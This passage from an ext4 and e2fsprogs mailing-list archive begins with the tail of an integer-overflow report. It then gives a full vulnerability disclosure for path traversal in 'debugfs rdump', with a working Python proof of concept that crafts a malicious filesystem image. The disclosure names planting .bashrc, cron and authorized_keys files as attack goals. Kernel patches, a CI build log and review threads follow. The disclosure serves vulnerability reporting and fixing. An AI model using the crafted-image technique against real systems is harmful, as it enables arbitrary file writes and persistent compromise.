retval = EXT2_ET_CORRUPT_SUPERBLOCK;
goto cleanup;
}
```
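To see what the extra check would and would not catch, the comparison can be modeled in Python. This is a sketch under the assumption that `inode_blocks_per_group` may or may not have been computed with truncation; `table_too_small` is a hypothetical name, and the third set of values is an ordinary-looking geometry chosen only for illustration.

```python
def table_too_small(inodes_per_group, inode_size, block_size,
                    inode_blocks_per_group):
    """Return True when the inode table cannot hold every inode in the group.

    Both sides are full-width products, so a wrapped
    inode_blocks_per_group is detected.
    """
    needed_bytes = inodes_per_group * inode_size
    available_bytes = inode_blocks_per_group * block_size
    return needed_bytes > available_bytes


# Crafted values from this report with the truncated result (1 block).
print(table_too_small(262145, 16384, 65536, 1))
# Same values with the untruncated result (65537 blocks).
print(table_too_small(262145, 16384, 65536, 65537))
# Illustrative geometry: 8192 inodes of 256 bytes, 4 KiB blocks, 512 table blocks.
print(table_too_small(8192, 256, 4096, 512))
```

Once the multiplication is done in 64 bits, this comparison no longer fires for the crafted image, so rejecting it would then depend on the existing upper-bound check seeing the untruncated value of 65537.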
## Timeline
- 2026-06-07: Bug discovered during security audit
[-- Attachment #5: REPORT-path-traversal.md --]
[-- Type: text/markdown; name="REPORT-path-traversal.md", Size: 5700 bytes --]
# e2fsprogs: Path Traversal in debugfs rdump allows arbitrary file write
## Summary
`debugfs rdump` extracts files from an ext2/ext3/ext4 filesystem image
to a local directory. Directory entry names read from the on-disk image
are not sanitized for path traversal sequences (`../`). An attacker who
provides a crafted filesystem image can cause files to be written to
arbitrary locations outside the intended extraction directory when the
victim runs `rdump`.
## Affected Component
- File: `debugfs/dump.c`, function `rdump_inode()`, line 265
- Also affects `rdump_symlink()` at line 242 (symlink target from image
used directly in `symlink()` syscall)
- Versions: all current versions including 1.47.4
## Severity
**High** — Arbitrary file write as the user running debugfs. If run as
root (common for filesystem recovery), this is full system compromise.
## Root Cause
In `rdump_inode()`, the output path is constructed by concatenating the
dump root with the directory entry name from the filesystem image:
```c
// debugfs/dump.c:265
sprintf(fullname, "%s/%s", dumproot, name);
```
The `name` variable comes from `rdump_dirent()` which reads it directly
from the on-disk `ext2_dir_entry.name` field (line 317):
```c
// debugfs/dump.c:316-318
thislen = ext2fs_dirent_name_len(dirent);
strncpy(name, dirent->name, thislen);
name[thislen] = 0;
```
No validation is performed to reject names containing `/`, `..`, or
absolute paths. When `name` is `../../etc/cron.d/evil`, the resulting
`fullname` resolves outside the dump directory.
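The effect of the unchecked concatenation can be shown with a purely lexical model. This is a sketch, not debugfs code: `rdump_target` and `escapes` are hypothetical helpers, and `posixpath.normpath` only approximates how the kernel resolves `..` (it ignores symlinks).

```python
import posixpath


def rdump_target(dumproot, name):
    """Join the way the sprintf() call does, then normalize for display."""
    fullname = f"{dumproot}/{name}"
    return fullname, posixpath.normpath(fullname)


def escapes(dumproot, name):
    """True if the normalized path is not inside dumproot (lexical check only)."""
    _, resolved = rdump_target(dumproot, name)
    root = posixpath.normpath(dumproot)
    return posixpath.commonpath([root, resolved]) != root


print(rdump_target("/tmp/safe_dir", "../../tmp/traversal_proof"))
print(escapes("/tmp/safe_dir", "../../tmp/traversal_proof"))
print(escapes("/tmp/safe_dir", "notes.txt"))
```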
Additionally, `rdump_symlink()` at line 242 creates a native symlink
whose target is read from the crafted image:
```c
// debugfs/dump.c:242
if (symlink(buf, fullname) == -1) { ... }
```
This allows the attacker to also create arbitrary symlinks on the host.
## Impact
An attacker crafts a filesystem image (e.g., on a USB drive or disk
image file) containing directory entries with `../` sequences in their
names. When a user extracts the image with `debugfs -R "rdump / <dir>"`,
the attacker's files are written outside the extraction directory.
Attack scenarios:
- Plant a `.bashrc` / `.profile` in the user's home directory
- Write to `/etc/cron.d/` for persistent code execution (if run as root)
- Overwrite `~/.ssh/authorized_keys` for SSH access
- Create malicious symlinks to redirect future operations
## Proof of Concept
### Setup
Build the Docker reproduction environment:
```bash
cd <e2fsprogs-source>
docker build -f Dockerfile.repro -t e2fsprogs-repro .
docker build -f Dockerfile.victim -t e2fs-victim .
```
### Reproduction
```bash
docker run --rm -it e2fs-victim
```
Inside the container:
```bash
# Check home directory — clean
ls -la /home/victim/
# Extract "USB drive" filesystem
/src/debugfs/debugfs /usb/drive.img -R "rdump / /home/victim/extracted"
# Check again — .bashrc appeared OUTSIDE extracted/
ls -la /home/victim/
cat /home/victim/.bashrc
```
**Result:** A `.bashrc` file with attacker-controlled content appears in
`/home/victim/`, not in `/home/victim/extracted/`. The crafted directory
entry `../.bashrc` escaped the dump directory.
### Manual image crafting (without Docker)
```python
#!/usr/bin/env python3
"""Craft ext2 image with path traversal directory entry."""
import struct, subprocess, sys

IMG = sys.argv[1]
# Create normal ext2 image
subprocess.run(['mke2fs', '-t', 'ext2', '-F', '-b', '1024', '-N', '128',
                '-O', '^dir_index', IMG, '4096'], check=True, capture_output=True)
# Write a payload file
with open('/tmp/_payload', 'w') as f:
    f.write('#!/bin/bash\necho PWNED\n')
subprocess.run(['debugfs', '-w', IMG, '-R', 'write /tmp/_payload testfile'],
               capture_output=True)
# Patch directory entry: rename "testfile" → "../../tmp/escaped"
with open(IMG, 'r+b') as f:
    f.seek(1024)
    sb = f.read(1024)
    bs = 1024 << struct.unpack_from('<I', sb, 24)[0]
    isz = struct.unpack_from('<H', sb, 88)[0]
    gd_off = bs * 2 if bs == 1024 else bs
    f.seek(gd_off)
    gd = f.read(64)
    itable = struct.unpack_from('<I', gd, 8)[0]
    f.seek(itable * bs + isz)  # root inode
    ri = f.read(isz)
    rblk = struct.unpack_from('<I', ri, 40)[0]
    f.seek(rblk * bs)
    dd = bytearray(f.read(bs))
    pos = 0
    while pos < bs:
        rl = struct.unpack_from('<H', dd, pos+4)[0]
        nl = dd[pos+6]
        if dd[pos+8:pos+8+nl] == b'testfile':
            # Overwrites in place; assumes the entry's rec_len leaves room
            # for the longer name.
            evil = b'../../tmp/escaped'
            dd[pos+6] = len(evil)
            dd[pos+8:pos+8+len(evil)] = evil
            break
        # Stop at the end of the block, or on a zero rec_len to avoid looping forever
        if rl == 0 or pos + rl >= bs:
            break
        pos += rl
    f.seek(rblk * bs)
    f.write(dd)
# Trigger: debugfs <IMG> -R "rdump / /tmp/safe"
# Result: /tmp/escaped is created outside /tmp/safe/
```
## Suggested Fix
Validate directory entry names in `rdump_dirent()` and `rdump_inode()`
before using them to construct host filesystem paths. Reject names
containing:
- `/` (slash) anywhere in the name
- `..` as a path component
- NUL bytes
Additionally, validate symlink targets in `rdump_symlink()` to prevent
creating symlinks pointing outside the extraction directory.
Example fix for `rdump_dirent()`:
```c
static int rdump_dirent(struct ext2_dir_entry *dirent, ...) {
...
thislen = ext2fs_dirent_name_len(dirent);
strncpy(name, dirent->name, thislen);
name[thislen] = 0;
/* Reject path traversal in directory entry names */
if (strchr(name, '/') || strcmp(name, "..") == 0 ||
strstr(name, "../") || strstr(name, "/..")) {
com_err("rdump", 0,
"skipping entry with path traversal: %s", name);
return 0;
}
...
}
```
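The rejection rule listed above can also be expressed as a single predicate over the raw name bytes. The following Python sketch is illustrative only: `is_safe_dirent_name` is a hypothetical helper, and whether `.` and `..` should be rejected here or are already skipped elsewhere in `rdump` is an assumption.

```python
def is_safe_dirent_name(name: bytes) -> bool:
    """Accept only a single, ordinary path component."""
    if not name:
        return False
    if name in (b".", b".."):
        return False
    if b"/" in name or b"\x00" in name:
        return False
    return True


for candidate in (b"testfile", b"../../tmp/escaped", b"..", b"a/b",
                  b"evil\x00.txt", b"..hidden"):
    print(candidate, is_safe_dirent_name(candidate))
```

Because any `/` is rejected outright, separate substring tests for `../` and `/..` become redundant, and `..` only needs a whole-name comparison; a legitimate name such as `..hidden` is still accepted.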
## Timeline
- 2026-06-07: Bug discovered during security audit
* [RFC PATCH] ext4: fix false-negative overwrite check for DIO spanning extent boundaries
From: Peng Wang @ 2026-06-07 12:49 UTC (permalink / raw)
To: tytso, adilger.kernel, libaokun, jack, ojaswin, ritesh.list,
yi.zhang
Cc: linux-ext4, linux-kernel, Peng Wang
ext4_overwrite_io() decides whether a direct I/O write is an overwrite
(all target blocks already allocated) so the write can proceed under a
shared inode lock. It calls ext4_map_blocks() once and returns false
if the mapped length is shorter than the requested length.
ext4_map_blocks() maps at most one extent per call. When a write
straddles two extents (e.g. a written extent and an adjacent unwritten
extent created by fallocate), the single call returns only the first
extent's length. ext4_overwrite_io() then mis-classifies the write as
non-overwrite and forces the caller to cycle i_rwsem from shared to
exclusive.
On workloads where a DIO writer appends through a fallocated region
while a DIO reader tails the same file, every write that crosses a
written/unwritten extent boundary triggers an exclusive lock
acquisition. The writer must wait for the reader's shared lock to be
released, and while waiting the RWSEM_FLAG_WAITERS bit blocks all
other shared acquirers. This serialises all writers to queue-depth 1
and throughput collapses.
Fix by looping ext4_map_blocks() over the remaining range. As long as
every queried extent reports allocated blocks (written or unwritten),
the function returns true and the write keeps the shared lock.
The *unwritten output now uses OR semantics across extents: set if any
block in the range is unwritten. This is correct for the two callers:
- (unaligned_io && unwritten) takes the exclusive lock, which is
needed if any block requires partial-block zeroing.
- (ilock_shared && !unwritten) selects ext4_iomap_overwrite_ops,
which skips journal transactions and is only safe when every block
is written/mapped.
The loop adds at most one extra ext4_map_blocks() call per extent
boundary, which is negligible compared to the lock contention it
eliminates.
Reproducer: two threads doing O_DIRECT I/O on a fallocated ext4 file.
Thread 1 appends sequentially in 4-16 KB writes. Thread 2 reads from
the tail of the file in up to 1 MB reads. Both use the same fd with
the file preallocated via posix_fallocate().
Tested on ext4 over NVMe, 6.6 based kernel:
                            before      after
writer-only throughput:     399 MB/s    412 MB/s
mixed (writer + reader):     11 MB/s    381 MB/s
write latency (mixed):      880 us       21 us
rwsem_down_write_slowpath
  (5 s sample, mixed):      1792           2
Signed-off-by: Peng Wang <peng_wang@linux.alibaba.com>
---
fs/ext4/file.c | 25 ++++++++++++++++---------
1 file changed, 16 insertions(+), 9 deletions(-)
diff --git a/fs/ext4/file.c b/fs/ext4/file.c
index eb1a323962b1..d060de8eddac 100644
--- a/fs/ext4/file.c
+++ b/fs/ext4/file.c
@@ -228,15 +228,22 @@ static bool ext4_overwrite_io(struct inode *inode,
map.m_len = EXT4_MAX_BLOCKS(len, pos, blkbits);
blklen = map.m_len;
- err = ext4_map_blocks(NULL, inode, &map, 0);
- if (err != blklen)
- return false;
- /*
- * 'err==len' means that all of the blocks have been preallocated,
- * regardless of whether they have been initialized or not. We need to
- * check m_flags to distinguish the unwritten extents.
- */
- *unwritten = !(map.m_flags & EXT4_MAP_MAPPED);
+ *unwritten = false;
+
+ while (blklen > 0) {
+ map.m_len = blklen;
+ err = ext4_map_blocks(NULL, inode, &map, 0);
+ /*
+ * err <= 0 means a hole or error; the write needs block
+ * allocation so it cannot be treated as an overwrite.
+ */
+ if (err <= 0)
+ return false;
+ if (!(map.m_flags & EXT4_MAP_MAPPED))
+ *unwritten = true;
+ blklen -= err;
+ map.m_lblk += err;
+ }
return true;
}
--
2.43.0
* [tytso-ext4:dev] BUILD SUCCESS 3ca1d19c1971ac4f25478eafb741e726bf2d5954
From: kernel test robot @ 2026-06-06 2:03 UTC (permalink / raw)
To: Theodore Ts'o; +Cc: linux-ext4
tree/branch: https://git.kernel.org/pub/scm/linux/kernel/git/tytso/ext4.git dev
branch HEAD: 3ca1d19c1971ac4f25478eafb741e726bf2d5954 ext4: improve str2hashbuf by processing 4-byte chunks and removing function pointers
elapsed time: 1717m
configs tested: 180
configs skipped: 15
The following configs have been built successfully.
More configs may be tested in the coming days.
tested configs:
alpha allnoconfig gcc-15.2.0
alpha allyesconfig gcc-16.1.0
alpha defconfig gcc-16.1.0
arc allnoconfig gcc-15.2.0
arc allyesconfig gcc-15.2.0
arc defconfig gcc-16.1.0
arc randconfig-001 gcc-8.5.0
arc randconfig-001-20260605 gcc-8.5.0
arc randconfig-002 gcc-8.5.0
arc randconfig-002-20260605 gcc-9.5.0
arm allnoconfig clang-23
arm defconfig clang-23
arm randconfig-001 gcc-16.1.0
arm randconfig-001-20260605 gcc-13.4.0
arm randconfig-002 gcc-15.2.0
arm randconfig-002-20260605 gcc-8.5.0
arm randconfig-003 clang-23
arm randconfig-003-20260605 clang-23
arm randconfig-004 gcc-13.4.0
arm randconfig-004-20260605 gcc-15.2.0
arm64 allmodconfig clang-19
arm64 allnoconfig gcc-15.2.0
arm64 defconfig gcc-16.1.0
arm64 randconfig-001-20260605 gcc-9.5.0
arm64 randconfig-002-20260605 gcc-10.5.0
arm64 randconfig-003-20260605 gcc-11.5.0
arm64 randconfig-004-20260605 clang-23
csky allmodconfig gcc-15.2.0
csky allnoconfig gcc-15.2.0
csky defconfig gcc-16.1.0
csky randconfig-001-20260605 gcc-16.1.0
csky randconfig-002-20260605 gcc-9.5.0
hexagon allmodconfig clang-23
hexagon allnoconfig clang-23
hexagon defconfig clang-23
hexagon randconfig-001-20260605 clang-20
hexagon randconfig-002-20260605 clang-23
i386 allmodconfig gcc-14
i386 allnoconfig gcc-14
i386 allyesconfig gcc-14
i386 buildonly-randconfig-001 gcc-14
i386 buildonly-randconfig-001-20260605 clang-22
i386 buildonly-randconfig-002 clang-22
i386 buildonly-randconfig-002-20260605 clang-22
i386 buildonly-randconfig-003 clang-22
i386 buildonly-randconfig-003-20260605 clang-22
i386 buildonly-randconfig-004 gcc-14
i386 buildonly-randconfig-004-20260605 clang-22
i386 buildonly-randconfig-005 gcc-14
i386 buildonly-randconfig-005-20260605 gcc-12
i386 buildonly-randconfig-006 gcc-14
i386 buildonly-randconfig-006-20260605 gcc-14
i386 defconfig clang-22
i386 randconfig-001-20260605 clang-20
i386 randconfig-002-20260605 clang-20
i386 randconfig-003-20260605 gcc-14
i386 randconfig-004-20260605 gcc-14
i386 randconfig-005-20260605 clang-20
i386 randconfig-006-20260605 gcc-14
i386 randconfig-007-20260605 clang-20
i386 randconfig-011-20260605 clang-22
i386 randconfig-012-20260605 clang-22
i386 randconfig-013-20260605 clang-22
i386 randconfig-014-20260605 clang-22
i386 randconfig-015-20260605 clang-22
i386 randconfig-016-20260605 clang-22
i386 randconfig-017-20260605 clang-22
loongarch allmodconfig clang-19
loongarch allnoconfig clang-23
loongarch defconfig clang-23
loongarch randconfig-001-20260605 clang-18
loongarch randconfig-002-20260605 gcc-16.1.0
m68k allmodconfig gcc-15.2.0
m68k allnoconfig gcc-15.2.0
m68k allyesconfig gcc-16.1.0
m68k defconfig gcc-16.1.0
microblaze allnoconfig gcc-15.2.0
microblaze allyesconfig gcc-15.2.0
microblaze defconfig gcc-16.1.0
mips allmodconfig gcc-15.2.0
mips allnoconfig gcc-15.2.0
mips allyesconfig gcc-15.2.0
nios2 allmodconfig gcc-11.5.0
nios2 allnoconfig gcc-11.5.0
nios2 defconfig gcc-11.5.0
nios2 randconfig-001-20260605 gcc-8.5.0
nios2 randconfig-002-20260605 gcc-8.5.0
openrisc allmodconfig gcc-15.2.0
openrisc allnoconfig gcc-15.2.0
openrisc defconfig gcc-16.1.0
parisc allmodconfig gcc-15.2.0
parisc allnoconfig gcc-15.2.0
parisc allyesconfig gcc-15.2.0
parisc defconfig gcc-16.1.0
parisc randconfig-001-20260605 gcc-14.3.0
parisc randconfig-002-20260605 gcc-12.5.0
parisc64 defconfig gcc-16.1.0
powerpc allmodconfig gcc-15.2.0
powerpc allnoconfig gcc-15.2.0
powerpc randconfig-001-20260605 gcc-8.5.0
powerpc randconfig-002-20260605 gcc-8.5.0
powerpc64 randconfig-001-20260605 clang-23
powerpc64 randconfig-002-20260605 gcc-8.5.0
riscv allnoconfig gcc-15.2.0
riscv defconfig clang-23
riscv randconfig-001 gcc-8.5.0
riscv randconfig-001-20260605 gcc-8.5.0
riscv randconfig-002 clang-23
riscv randconfig-002-20260605 clang-23
s390 allmodconfig clang-18
s390 allnoconfig clang-23
s390 allyesconfig gcc-15.2.0
s390 defconfig clang-18
s390 randconfig-001 gcc-11.5.0
s390 randconfig-001-20260605 clang-23
s390 randconfig-002 clang-23
s390 randconfig-002-20260605 clang-23
sh allmodconfig gcc-16.1.0
sh allnoconfig gcc-15.2.0
sh allyesconfig gcc-15.2.0
sh defconfig gcc-16.1.0
sh randconfig-001 gcc-16.1.0
sh randconfig-001-20260605 gcc-16.1.0
sh randconfig-002 gcc-14.3.0
sh randconfig-002-20260605 gcc-10.5.0
sparc allnoconfig gcc-15.2.0
sparc defconfig gcc-16.1.0
sparc randconfig-001-20260605 gcc-15.2.0
sparc randconfig-002-20260605 gcc-16.1.0
sparc64 allmodconfig clang-23
sparc64 defconfig clang-23
sparc64 randconfig-001-20260605 clang-23
sparc64 randconfig-002-20260605 clang-23
um allmodconfig clang-19
um allnoconfig clang-23
um allyesconfig gcc-14
um defconfig clang-23
um i386_defconfig gcc-14
um randconfig-001-20260605 clang-19
um randconfig-002-20260605 clang-23
um x86_64_defconfig clang-23
x86_64 allmodconfig clang-22
x86_64 allnoconfig clang-20
x86_64 allyesconfig clang-22
x86_64 buildonly-randconfig-001 gcc-12
x86_64 buildonly-randconfig-001-20260605 gcc-14
x86_64 buildonly-randconfig-002 clang-20
x86_64 buildonly-randconfig-002-20260605 gcc-14
x86_64 buildonly-randconfig-003 gcc-14
x86_64 buildonly-randconfig-003-20260605 gcc-14
x86_64 buildonly-randconfig-004 gcc-14
x86_64 buildonly-randconfig-004-20260605 gcc-14
x86_64 buildonly-randconfig-005 gcc-14
x86_64 buildonly-randconfig-005-20260605 gcc-14
x86_64 buildonly-randconfig-006 clang-20
x86_64 buildonly-randconfig-006-20260605 gcc-14
x86_64 defconfig gcc-14
x86_64 randconfig-001-20260605 clang-22
x86_64 randconfig-002-20260605 clang-22
x86_64 randconfig-003-20260605 clang-22
x86_64 randconfig-004-20260605 gcc-13
x86_64 randconfig-005-20260605 clang-22
x86_64 randconfig-006-20260605 gcc-14
x86_64 randconfig-011-20260605 clang-22
x86_64 randconfig-012-20260605 gcc-14
x86_64 randconfig-013-20260605 clang-22
x86_64 randconfig-014-20260605 clang-22
x86_64 randconfig-015-20260605 gcc-14
x86_64 randconfig-016-20260605 clang-22
x86_64 randconfig-071-20260605 gcc-14
x86_64 randconfig-072-20260605 gcc-14
x86_64 randconfig-073-20260605 clang-20
x86_64 randconfig-074-20260605 gcc-14
x86_64 randconfig-075-20260605 gcc-12
x86_64 randconfig-076-20260605 gcc-14
x86_64 rhel-9.4-rust clang-22
xtensa alldefconfig gcc-16.1.0
xtensa allnoconfig gcc-15.2.0
xtensa randconfig-001-20260605 gcc-8.5.0
xtensa randconfig-002-20260605 gcc-8.5.0
--
0-DAY CI Kernel Test Service
https://github.com/intel/lkp-tests/wiki
* Re: [PATCH 10/17] jbd2: replace __get_free_pages() with kmalloc()
From: Matthew Wilcox @ 2026-06-05 20:54 UTC (permalink / raw)
To: David Laight
Cc: Theodore Tso, Mike Rapoport, Jan Kara, Mark Fasheh, Joel Becker,
Joseph Qi, Ryusuke Konishi, Viacheslav Dubeyko, Trond Myklebust,
Anna Schumaker, Chuck Lever, Jeff Layton, NeilBrown,
Olga Kornievskaia, Dai Ngo, Tom Talpey, Alexander Viro,
Christian Brauner, Jan Kara, Dave Kleikamp, Miklos Szeredi,
Andreas Hindborg, Breno Leitao, Kees Cook, Tigran A. Aivazian,
linux-kernel, linux-fsdevel, ocfs2-devel, linux-nilfs, linux-nfs,
jfs-discussion, linux-ext4, linux-mm
In-Reply-To: <20260605093332.7b067876@pumpkin>
On Fri, Jun 05, 2026 at 09:33:32AM +0100, David Laight wrote:
> On Thu, 4 Jun 2026 10:05:52 -0400
> "Theodore Tso" <tytso@mit.edu> wrote:
>
> ...
> > I suppose we could do it with kmalloc() with some flags to
> > prevent forced reclaim / compaction, and if that fails, then fall back
> > to vmalloc(). Is there a better way?
>
> There is already kvalloc().
> I'm not sure how hard that tries to get kmalloc() to succeed.
Please don't try to help.
* Re: [PATCH 00/17] replace __get_free_pages() call with kmalloc()
From: Zi Yan @ 2026-06-05 20:00 UTC (permalink / raw)
To: Mike Rapoport (Microsoft)
Cc: Jan Kara, Mark Fasheh, Joel Becker, Joseph Qi, Ryusuke Konishi,
Viacheslav Dubeyko, Trond Myklebust, Anna Schumaker, Chuck Lever,
Jeff Layton, NeilBrown, Olga Kornievskaia, Dai Ngo, Tom Talpey,
Alexander Viro, Christian Brauner, Jan Kara, Dave Kleikamp,
Theodore Ts'o, Miklos Szeredi, Andreas Hindborg, Breno Leitao,
Kees Cook, Tigran A. Aivazian, linux-kernel, linux-fsdevel,
ocfs2-devel, linux-nilfs, linux-nfs, jfs-discussion, linux-ext4,
linux-mm
In-Reply-To: <20260523-b4-fs-v1-0-275e36a83f0e@kernel.org>
On 23 May 2026, at 13:54, Mike Rapoport (Microsoft) wrote:
> This is a (small) part of larger work of replacing page allocator calls
> with kmalloc.
Is the goal to get rid of __get_free_page(s)()?
Thanks.
>
> Also in git:
> https://git.kernel.org/pub/scm/linux/kernel/git/rppt/linux.git gfp-to-kmalloc/fs
>
> Signed-off-by: Mike Rapoport (Microsoft) <rppt@kernel.org>
> ---
> Mike Rapoport (Microsoft) (17):
> quota: allocate dquot_hash with kmalloc()
> proc: replace __get_free_page() with kmalloc()
> ocfs2/dlm: replace __get_free_page() with kmalloc()
> nilfs2: replace get_zeroed_page() with kzalloc()
> NFS: replace __get_free_page() with kmalloc() in nfs_show_devname()
> NFS: remove unused page and page2 in nfs4_replace_transport()
> NFSD: replace __get_free_page() with kmalloc() in nfsd_buffered_readdir()
> libfs: simple_transaction_get(): replace get_zeroed_page() with kzalloc()
> jfs: replace __get_free_page() with kmalloc()
> jbd2: replace __get_free_pages() with kmalloc()
> isofs: replace __get_free_page() with kmalloc()
> fuse: replace __get_free_page() with kmalloc()
> fs/select: replace __get_free_page() with kmalloc()
> fs/namespace: use __getname() to allocate mntpath buffer
> configfs: replace __get_free_pages() with kzalloc()
> binfmt_misc: replace __get_free_page() with kmalloc()
> bfs: replace get_zeroed_page() with kzalloc()
>
> fs/bfs/inode.c | 4 ++--
> fs/binfmt_misc.c | 4 ++--
> fs/configfs/file.c | 7 +++----
> fs/fuse/ioctl.c | 5 +++--
> fs/isofs/dir.c | 5 +++--
> fs/jbd2/journal.c | 7 ++-----
> fs/jfs/jfs_dtree.c | 16 ++++++++--------
> fs/libfs.c | 6 +++---
> fs/namespace.c | 4 ++--
> fs/nfs/nfs4namespace.c | 15 +--------------
> fs/nfs/super.c | 4 ++--
> fs/nfsd/vfs.c | 4 ++--
> fs/nilfs2/ioctl.c | 4 ++--
> fs/ocfs2/dlm/dlmdebug.c | 24 +++++++++---------------
> fs/ocfs2/dlm/dlmdomain.c | 8 +++++---
> fs/ocfs2/dlm/dlmmaster.c | 5 ++---
> fs/ocfs2/dlm/dlmrecovery.c | 4 ++--
> fs/proc/base.c | 16 ++++++++--------
> fs/quota/dquot.c | 11 +++++------
> fs/select.c | 4 ++--
> 20 files changed, 68 insertions(+), 89 deletions(-)
> ---
> base-commit: 5d6919055dec134de3c40167a490f33c74c12581
> change-id: 20260522-b4-fs-5e5c70f31664
>
> Best regards,
> --
> Sincerely yours,
> Mike.
Best Regards,
Yan, Zi
* Re: [PATCH] ext4: avoid full buffer walks for large folio partial writes
From: Matthew Wilcox @ 2026-06-05 14:24 UTC (permalink / raw)
To: Jia Zhu
Cc: Theodore Ts'o, Andreas Dilger, Alexander Viro,
Christian Brauner, Jan Kara, Baokun Li, Ojaswin Mujoo,
Ritesh Harjani, Zhang Yi, linux-ext4, linux-fsdevel, linux-kernel
In-Reply-To: <20260605090253.32822-1-zhujia.zj@bytedance.com>
On Fri, Jun 05, 2026 at 05:02:53PM +0800, Jia Zhu wrote:
> On Wed, Jun 03, 2026 at 07:11:48PM +0100, Matthew Wilcox wrote:
> > Is this a common case for you, or is this something you noticed by
> > inspection?
>
> This was found by our kernel release benchmark. We run libMicro as part
> of that test suite:
>
> https://github.com/rzezeski/libMicro
>
> The regression shows up in buffered write/pwrite/writev overwrite tests
> on ext4 large folios.
Makes sense. I'll assume this can correspond to a reasonable workload.
It certainly seems like something that could exist.
> > Wouldn't you get just as much benefit from this?
>
> Yes. I tested this approach, and it gives almost the same result as my
> original partial-commit helper.
Excellent! Obviously it'd be even better if we didn't have to walk the
leading buffer_heads ... but there's no way to do this with the data
structure we have.
> Agreed. The original ext4_block_write_begin() change was too aggressive.
> Seeking directly to @from also skips the prefix buffers, which makes the
> old side effects harder to prove.
>
> For v2 I plan to drop that part and keep the existing walk from the head.
> The ext4 change would only stop after @to when the folio was already
> uptodate on entry, similar to your block_commit_write() suggestion:
>
> +	bool folio_uptodate = folio_test_uptodate(folio);
> +
>  	for (bh = head, block_start = 0;
> -	     bh != head || !block_start;
> +	     (bh != head || !block_start) &&
> +	     (!folio_uptodate || block_start < to);
>  	     block++, block_start = block_end, bh = bh->b_this_page) {
>  		...
>  	}
Yes, I think that's a good approach.
> So the prefix path and all in-range handling stay unchanged. The only
> skipped work is the tail part after @to, and only for a folio that was
> already uptodate before write_begin() started.
>
> > ... converting ext4 to use iomap instead of buffer heads.
>
> I strongly agree that iomap is the right direction for ext4. The iomap
> buffered write path would make this particular buffer-head walk cost go
> away.
>
> The reason I am still looking at this path is that the regression is
> visible in our LTS upgrade testing from 6.12 to 6.18. It was introduced
> by the ext4 large-folio enablement in v6.16. For example, in our
> libMicro release benchmark with THP always enabled, usecs/call, lower is
> better:
>
> case          v6.12    v6.18    regression
> write_u1k     0.609    4.659    +665.0%
> write_u10k    1.408    4.869    +245.8%
Ouch ;-) No wonder you want to address this. Do you recover all the
regression with this fix?
> The iomap conversion is the long-term fix, but it does not help kernels
> which still use the buffer-head buffered write path. I would like to keep
> this as a small regression fix for that path, and make it minimal enough
> to be suitable for stable/LTS backport.
Is it that you're using some ext4 features that aren't supported by
iomap yet? Could you say which ones? That might motivate someone to
prioritise that support.
> Would this v2 direction look OK to you?
Absolutely. Very happy with this approach.
* Re: [PATCH 10/17] jbd2: replace __get_free_pages() with kmalloc()
From: Uladzislau Rezki @ 2026-06-05 9:50 UTC (permalink / raw)
To: David Laight
Cc: Theodore Tso, Mike Rapoport, Jan Kara, Mark Fasheh, Joel Becker,
Joseph Qi, Ryusuke Konishi, Viacheslav Dubeyko, Trond Myklebust,
Anna Schumaker, Chuck Lever, Jeff Layton, NeilBrown,
Olga Kornievskaia, Dai Ngo, Tom Talpey, Alexander Viro,
Christian Brauner, Jan Kara, Dave Kleikamp, Miklos Szeredi,
Andreas Hindborg, Breno Leitao, Kees Cook, Tigran A. Aivazian,
linux-kernel, linux-fsdevel, ocfs2-devel, linux-nilfs, linux-nfs,
jfs-discussion, linux-ext4, linux-mm
In-Reply-To: <20260605093332.7b067876@pumpkin>
On Fri, Jun 05, 2026 at 09:33:32AM +0100, David Laight wrote:
> On Thu, 4 Jun 2026 10:05:52 -0400
> "Theodore Tso" <tytso@mit.edu> wrote:
>
> ...
> > I suppose we could do it with kmalloc() with some flags to
> > prevent forced reclaim / compaction, and if that fails, then fall back
> > to vmalloc(). Is there a better way?
>
> There is already kvalloc().
> I'm not sure how hard that tries to get kmalloc() to succeed.
>
I assume you mean kvmalloc()? kvalloc() is something unknown to me.
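For anyone following along, the "try contiguous first, then fall back" pattern being discussed can be modelled in user space roughly as below. This is only a sketch under stated assumptions: demo_alloc_with_fallback(), the two stand-in allocators and the 8 KiB cut-off are hypothetical, and it makes no claim about how hard the real kvmalloc() tries or which GFP flags it uses.

```c
#include <stddef.h>
#include <stdlib.h>

/* Hypothetical allocator callback type; returns NULL on failure. */
typedef void *(*demo_alloc_fn)(size_t size);

/* Records which path satisfied the request, for illustration only. */
enum demo_path { DEMO_NONE, DEMO_CONTIG, DEMO_FALLBACK };

/*
 * Try the (notionally physically contiguous) allocator first and only
 * use the fallback allocator when that fails.
 */
void *demo_alloc_with_fallback(size_t size, demo_alloc_fn contig,
			       demo_alloc_fn fallback, enum demo_path *path)
{
	void *p = contig(size);

	if (p) {
		*path = DEMO_CONTIG;
		return p;
	}
	p = fallback(size);
	*path = p ? DEMO_FALLBACK : DEMO_NONE;
	return p;
}

/* Stand-in for a contiguous allocator; the 8 KiB limit is made up. */
void *demo_contig_alloc(size_t size)
{
	return size <= 8192 ? malloc(size) : NULL;
}

/* Stand-in for a vmalloc-style allocator that accepts any size. */
void *demo_virt_alloc(size_t size)
{
	return malloc(size);
}
```

In this model the caller cannot tell which path was taken except through the path argument, so a single free routine has to cope with both; in the kernel that role is played by kvfree().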
--
Uladzislau Rezki
* Re: [PATCH] ext4: avoid full buffer walks for large folio partial writes
From: Jia Zhu @ 2026-06-05 9:02 UTC (permalink / raw)
To: Matthew Wilcox
Cc: Jia Zhu, Theodore Ts'o, Andreas Dilger, Alexander Viro,
Christian Brauner, Jan Kara, Baokun Li, Ojaswin Mujoo,
Ritesh Harjani, Zhang Yi, linux-ext4, linux-fsdevel, linux-kernel
In-Reply-To: <aiBuZE5NWMfOGAA6@casper.infradead.org>
On Wed, Jun 03, 2026 at 07:11:48PM +0100, Matthew Wilcox wrote:
> Is this a common case for you, or is this something you noticed by
> inspection?
This was found by our kernel release benchmark. We run libMicro as part
of that test suite:
https://github.com/rzezeski/libMicro
The regression shows up in buffered write/pwrite/writev overwrite tests
on ext4 large folios.
> Wouldn't you get just as much benefit from this?
Yes. I tested this approach, and it gives almost the same result as my
original partial-commit helper.
I agree this is a better direction for block_commit_write(). It keeps the
existing buffer-head state handling and only stops the tail walk after an
already-uptodate folio has been committed through @to. That removes the
main large-folio cost in our small-overwrite benchmark while keeping the
change much closer to the old code.
> I'm unconvinced that this is safe ...
Agreed. The original ext4_block_write_begin() change was too aggressive.
Seeking directly to @from also skips the prefix buffers, which makes the
old side effects harder to prove.
For v2 I plan to drop that part and keep the existing walk from the head.
The ext4 change would only stop after @to when the folio was already
